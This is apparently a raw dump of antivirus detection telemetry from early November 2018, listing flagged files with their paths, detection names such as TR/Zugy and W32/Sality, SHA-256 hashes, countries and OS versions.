  Row(detection=Row(filename='avscan-20181102-054908-fc6c459c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054908-FC6C459C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053241-b0307f49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053241-B0307F49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050939-786c9851', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050939-786C9851', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061643-d6ca1a31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061643-D6CA1A31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061524-a7c56d3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061524-A7C56D3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053702-4bb280e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053702-4BB280E0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051801-a3d52da3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051801-A3D52DA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='89628d82df170f22428b66ed45b3eb9acf7e357b6a28a83d49e9ebf29dca5dc6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T03:23:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051200-cc2452ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051200-CC2452AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062132-82f55039', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062132-82F55039', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061701-e1cce037', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061701-E1CCE037', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055937-735c724a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055937-735C724A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060001-81c0a3f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060001-81C0A3F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053808-72df6126', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053808-72DF6126', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052600-c10dc0db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052600-C10DC0DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T21:44:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055442-c36dcb0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055442-C36DCB0D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060727-8b46588e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060727-8B46588E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062212-9adb805f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062212-9ADB805F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:18:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054852-f2d6595e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054852-F2D6595E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055429-bb8dc278', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055429-BB8DC278', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060149-c218b964', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060149-C218B964', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:45:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T23:25:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:53:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052015-f32935a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052015-F32935A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060257-eac8ae60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060257-EAC8AE60', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055955-7e0ebd31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055955-7E0EBD31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-160339-0f29c1db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160339-0F29C1DB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xcopy.exe', filepath='\\\\?\\C:\\Windows\\System32\\xcopy.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='011950d1ebe4c9b09276a34f0c41ab31f0e5e9d6561f68ddf41f4aa28df97e31', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:57:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155424-b19a01ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155424-B19A01BA', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mdac_typ.exe', filepath='D:\\SETUP TN\\Crtal 8.5\\V8.5\\REDIST\\IT\\MDAC_TYP.EXE', filesize=6636000, name='W32/Sality.AT.#M1.#R1'), hash='08be2734df3cfcd7dc5c69c851a58e49411d340cc7f30aaad88f18067e996b36', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:34:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091902-f3267c37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-091843-EFD64E6A\\AVSCAN-20181101-091902-F3267C37', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:20:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155746-d3b531e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155746-D3B531E0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nc 27.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\TEMUAN CAP AEON\\NC 27\\NC 27.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000632-16d8c428', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09479a50\\AVSCAN-20181101-232059-A9CB4FEB\\AVSCAN-20181102-000632-16D8C428', filesize=432000, name='Adware/Ibryte.bxpj.#M1.#R1'), hash='331a02dc5297a1d3a9d00567566bd8138ed365685faaaf71965f008290871e92', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:05:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bulanan hrd.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\LAPORAN BULANAN HRD\\BULANAN HRD.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160002-ea823821', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160002-EA823821', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='donor darah.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\FOTO DONOR DARAH\\DONOR DARAH.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\AVIRA\\ANTIVIRUS\\AVIRASECURITYCENTERAGENT.EXE', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-10-31-07-04-18.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-22T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', parentsize=840000, timestamp='2018-11-01T00:15:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pencuri uang.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\DATA PENCURI UANG\\PENCURI UANG.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='opr tetap spinning (mutasi).exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\GAJI GARMENT 2017\\GAJI OPR TETAP SPINNING (MUTASI)\\OPR TETAP SPINNING (MUTASI).exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ar405eng.exe', filepath='C:\\Users\\X\\Desktop\\MS-Office 2007\\languege  ++\\java\\BLUE_J\\AR405ENG.EXE', filesize=224000, name='TR/Patched.Gen.#M300.#R3369'), hash='348160992ce9581786ed0cbad3f663ab7022c159087f641916f352db0beb7106', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:AienThs2pkGtAdDt.1', country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:10:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kesehatan.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\BPJS KESEHATAN\\KESEHATAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='juli.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\GAJI GARMENT 2017\\JULI\\JULI.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102027-664b8d88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3c8c5a5\\AVSCAN-20181101-102004-622836C3\\AVSCAN-20181101-102027-664B8D88', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='AL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:20:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsmB013.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235757-d1f92412', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09479a50\\AVSCAN-20181101-232059-A9CB4FEB\\AVSCAN-20181101-235757-D1F92412', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='b1bbffbe641df1b785b36a08b3098eff6e8615d77fefa8f1e9559a483cf29d9c', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:57:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154108-616f39ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_30cda9a5\\AVSCAN-20181101-064204-6F5AEFD4\\AVSCAN-20181101-154108-616F39CE', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:41:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7349011.exe', filepath='\\\\?\\C:\\Program Files (x86)\\gzpem\\7349011.exe', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:58:34Z'), dt=datetime.date(2018, 11, 1)),
